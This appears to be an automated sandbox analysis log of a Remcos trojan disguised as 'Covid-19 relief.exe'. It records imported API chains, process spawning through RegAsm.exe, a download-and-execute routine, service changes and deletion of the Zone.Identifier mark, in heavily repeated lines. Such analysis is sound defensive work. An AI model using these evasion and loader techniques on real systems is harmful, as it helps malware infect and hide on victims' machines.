            Source: Covid-19.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Covid-19 relief.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Covid-19.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@17/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0040EC0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0040EC0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_0040EC0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00409A2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00409A2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_00409D02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_00409D02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411927
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411927
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-A380KR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-A380KR
            Source: Covid-19 relief.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Covid-19 relief.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Covid-19 relief.exeReversingLabs: Detection: 39%
            Source: Covid-19 relief.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile read: C:\Users\user\Desktop\Covid-19 relief.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile read: C:\Users\user\Desktop\Covid-19 relief.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: unknownProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: unknownProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: Covid-19 relief.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Covid-19 relief.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Covid-19 relief.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Covid-19 relief.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C34AC0 push eax; ret 1_2_00C34AC1
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C35D78 pushfd ; iretd 1_2_00C35D79
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C34AC0 push eax; ret 1_2_00C34AC1
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C35D78 pushfd ; iretd 1_2_00C35D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413ED0 push eax; ret 2_2_00413EFE
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D74AC0 push eax; ret 3_2_00D74AC1
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D75D78 pushfd ; iretd 3_2_00D75D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00413ED0 push eax; ret 5_2_00413EFE
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87913546933
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87913546933
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87913546933
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87913546933
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040D4E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040D4E5
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to dropped file
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to dropped file
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to dropped file
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile created: C:\Users\user\AppData\Roaming\Covid-19Jump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411700

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile opened: C:\Users\user\AppData\Roaming\Covid-19:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile opened: C:\Users\user\AppData\Roaming\Covid-19:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
